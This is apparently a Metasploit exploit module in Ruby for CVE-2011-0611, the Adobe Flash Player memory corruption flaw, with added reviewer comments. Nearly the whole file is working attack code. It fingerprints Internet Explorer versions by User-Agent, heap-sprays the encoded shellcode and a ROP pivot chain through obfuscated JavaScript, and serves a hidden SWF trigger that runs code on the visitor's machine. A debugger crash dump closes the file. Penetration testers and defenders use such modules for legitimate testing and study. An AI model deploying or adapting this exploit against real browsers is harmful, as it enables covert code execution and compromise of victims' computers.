GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  # Module metadata: name, references (CVE-2011-0611 / APSB11-07), payload
  # constraints and one entry per supported browser/OS pairing, plus the
  # single OBFUSCATE option.
  #
  # Every concrete target's hash holds the values that on_request_uri pastes
  # into the served JavaScript and into the pivot bytes:
  #   'Rop' / 'Pivot'    - whether the ROP path is taken, and the pivot address
  #                        it packs (nil when 'Rop' is false)
  #   'Offset1' / 'Max1' - offset and loop bound for the first heap_spray call
  #   'Offset2' / 'Max2' - offset and loop bound for the second heap_spray call
  # The offsets and bounds are hex *strings*, not integers, because they are
  # interpolated verbatim into JavaScript source.
  # Target 0 ('Automatic') carries no parameters; get_target resolves it from
  # the request's User-Agent.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",
      'Description' => %q{
          This module exploits a vulnerability in Adobe Flash Player that was discovered,
          and has been exploited actively in the wild. By embedding a specially crafted .swf
          file, Adobe Flash crashes due to an invalid use of an object type, which allows
          attackers to overwrite a pointer in memory, and results arbitrary code execution.
          Please note for IE 8 targets, Java Runtime Environment must be available on the
          victim machine in order to work properly.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'sinn3r',
        ],
      'References' =>
        [
          [ 'CVE', '2011-0611' ],
          [ 'OSVDB', '71686' ],
          [ 'BID', '47314' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],
          [ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],
          [ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],
          [ 'URL', 'http://web.archive.org/web/20110417154057/http://secunia.com:80/blog/210/' ],
        ],
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "process",
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # Index 0 is the default; on_request_uri replaces it per request.
          [ 'Automatic', {} ],
          [
            'IE 6 on Windows XP SP3',
            {
              'Rop' => false,
              'Pivot' => nil, #No ROP no pivot
              'Offset1' => '0x01', #For aligning the payload
              'Offset2' => '0x02', #For aligning the CALL
              'Max1' => '0x150', #First spray
              'Max2' => '0x200' #Second spray
            }
          ],
          [
            'IE 7 on Windows XP SP3',
            {
              'Rop' => false,
              'Pivot' => nil, #No ROP no pivot
              'Offset1' => '0x01', #For aligning the payload
              'Offset2' => '0x02', #For aligning the CALL
              'Max1' => '0x150', #First spray
              'Max2' => '0x200' #Second spray
            }
          ],
          [
            'IE 8 on Windows XP SP3',
            {
              'Rop' => true,
              'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)
              'Offset1' => '0x5E2', #Offset for rop+payload
              'Offset2' => '0x02', #Offset to 0x11111110
              'Max1' => '0x250', #First spray
              'Max2' => '0x200' #Second spray
            }
          ],
          [
            'IE 7 on Windows Vista',
            {
              'Rop' => false,
              'Pivot' => nil, #No ROP no pivot
              'Offset1' => '0x01', #For aligning the payload
              'Offset2' => '0x02', #For aligning the CALL
              'Max1' => '0x150', #First spray
              'Max2' => '0x200' #Second spray
            }
          ],
          [
            'IE 8 on Windows 7',
            {
              'Rop' => true,
              'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)
              'Offset1' => '0x5F4', #Offset for rop+payload
              'Offset2' => '0x02', #Offset to 0x11111110
              'Max1' => '0x101', #First spray
              'Max2' => '0x300' #Second spray
            }
          ]
        ],
      'Privileged' => false,
      'DisclosureDate' => '2011-04-11',
      'DefaultTarget' => 0))

    # OBFUSCATE defaults to true: the generated JavaScript is run through
    # JSObfu before it is embedded in the HTML (see on_request_uri).
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
      ], self.class
    )

  end

  # Reads the trigger SWF shipped in the framework data directory into
  # @trigger (served later by on_request_uri), then calls the mixin's
  # exploit via super — presumably that is what starts the HTTP server.
  #
  # NOTE(review): the handle is only closed on the success path; if read
  # raises, f leaks. The block form `File.open(path, "rb") { |f| ... }` or
  # File.binread would close it unconditionally. Left unchanged here.
  def exploit
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-0611.swf")
    f = File.open(path, "rb")
    @trigger = f.read(f.stat.size)
    f.close
    super
  end

  # Picks a concrete target (indexes 1-5 of the 'Targets' table) from the
  # request's User-Agent, pairing the Windows NT version substring with the
  # MSIE version substring.
  #
  # @param request the incoming HTTP request; only its 'User-Agent' header is read
  # @return the matching target, or nil when no pair matches — including when
  #   the header is absent, since `nil =~ regexp` is nil and every branch fails
  def get_target(request)
    agent = request.headers['User-Agent']

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
      #Windows XP SP3 + IE 6.0
      return targets[1]
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
      #Windows XP SP3 + IE 7.0
      return targets[2]
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
      #Windows XP SP3 + IE 8.0 + JRE6
      return targets[3]
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
      #Windows Vista + IE 7
      return targets[4]
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
      #Windows 7 + IE 8 + JRE6
      return targets[5]
    else
      return nil
    end
  end

  # Request handler for the module's URI. Three outcomes:
  #   * 404 when the selected target is 'Automatic' and get_target has no
  #     entry for the User-Agent (a non-Automatic target skips the UA check);
  #   * the raw SWF loaded in #exploit when the path ends in ".swf";
  #   * otherwise an HTML page whose script sprays the encoded payload and a
  #     block of fake pointers, then references the SWF from <object>/<embed>
  #     so the browser fetches it on a second request.
  #
  # From the defender's side the stable server-side markers are the two
  # Content-Type values set below ("application/x-shockwave-flash" and
  # "text/html"); the SWF's base name is rand_text_alpha(rand(3)), i.e. zero
  # to two random letters, so the file name itself is not a usable indicator.
  #
  # @param cli     the client connection passed to send_response / send_not_found
  # @param request the incoming HTTP request (uri and User-Agent are read)
  def on_request_uri(cli, request)
    #Set default target
    my_target = target

    #If user chooses automatic target, we choose one based on user agent
    if my_target.name =~ /Automatic/
      my_target = get_target(request)
      if my_target.nil?
        print_error("Sending 404 for unknown user-agent")
        send_not_found(cli)
        return
      end
      vprint_status("Target selected: #{my_target.name}")
    end

    vprint_status("URL: #{request.uri}")

    if request.uri =~ /\.swf$/
      #Browser requests our trigger file, why not
      # @trigger is populated by #exploit before the server is up.
      print_status("Sending trigger SWF...")
      send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )
      return
    end

    #Targets that don't need ROP
    pivot = "\xb8\x0c\x0c\x0c\x0c" #MOV EAX,0x0c0c0c0c
    pivot << "\xff\xe0" #JMP EAX
    pivot << "\x41" #Pad

    #Targets that need ROP
    # For 'Rop' targets the inline stub above is replaced by three
    # little-endian dwords ('V*'), and the payload is wrapped by the RopDb
    # mixin's 'java' chain — hence the JRE requirement in the Description.
    if my_target['Rop']
      #Target Addr=0x11111110
      pivot =
        [
          0x0c0c0c0c, # Padding. Value for ESP after the XCHG pivot
          my_target['Pivot'], # ROP Pivot
          0x7c346b52, # EAX (POP ESP; RETN)
        ].pack('V*')

      #Target Addr=0x0c0c0c0c
      p = generate_rop_payload('java', payload.encoded)
    else
      p = payload.encoded
    end

    # Both byte strings are converted to JavaScript %u-escaped form using the
    # target architecture's endianness.
    arch = Rex::Arch.endian(my_target.arch)

    shellcode = Rex::Text.to_unescape(p, arch)
    pivot = Rex::Text.to_unescape(pivot, arch)

    #Extract string based on target
    # Per-target substring bounds spliced into heap_spray() below; the two
    # IE 8 targets use their own bounds, everything else shares the default.
    if my_target.name == 'IE 8 on Windows 7'
      js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"
    elsif my_target.name == 'IE 8 on Windows XP SP3'
      js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
    else
      js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
    end

    # randnop is a random identifier (1-100 letters) for the nop-sled
    # variable; js_nops is four 0x0c bytes in %u-escaped form.
    randnop = rand_text_alpha(rand(100) + 1)
    js_nops = Rex::Text.to_unescape("\x0c"*4)

    # heap_spray() is called twice: once with the shellcode (Offset1/Max1)
    # and once with the pivot dwords as both sled and content (Offset2/Max2).
    js = <<-JS
    function heap_spray(heaplib, nops, code, offset, max) {
      while (nops.length < 0x2000) nops += nops;
      var offset = nops.substring(0, offset);
      var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      #{js_extract_str}
      heaplib.gc();
      for (var i=1; i<max; i++) {
        heaplib.alloc(block);
      }
    }

    var heap_obj = new heapLib.ie(0x20000);
    var #{randnop} = "#{js_nops}";
    var nops = unescape(#{randnop});
    var code = unescape("#{shellcode}");
    heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
    var fake_pointers = unescape("#{pivot}");
    heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});
    JS

    # Prepends the heapLib helper; :noobfu presumably suppresses heaplib's own
    # obfuscation, since obfuscation is applied separately just below.
    js = heaplib(js, {:noobfu => true} )

    #Javascript obfuscation is optional
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate(memory_sensitive: true)
    end

    # NOTE(review): rand(3) can be 0, giving an empty base name ("<resource>/.swf").
    # The .swf suffix is what the handler above matches on, so it still works.
    trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"

    # Heredoc body is indented exactly four spaces; the gsub below strips
    # that indent from every line before the page is sent.
    html = <<-EOS
    <html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{trigger_file_name}" />
    <embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"
    pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>
    </body>
    </html>
    EOS

    html = html.gsub(/^ {4}/, "")

    # NOTE(review): the log line is truncated ("to..." names no client);
    # left as-is since it is a runtime string.
    print_status("Sending HTML to...")
    send_response(cli, html, {'Content-Type' => "text/html"} )
  end
end
=begin
0:000> r
eax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0
eip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
Flash10o+0xd01f6:
100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????
0:000> dd ecx
01d650b0 11111110 00000000 00000000 00000000
01d650c0 00000000 00000000 00000000 00000000
01d650d0 00000000 00000000 00000000 00000000
01d650e0 00000000 00000000 00000000 00000000
01d650f0 00000000 00000000 00000000 00000000
01d65100 00000000 00000000 00000000 00000000
01d65110 00000000 00000000 00000000 00000000
01d65120 00000000 00000000 00000000 00000000
=end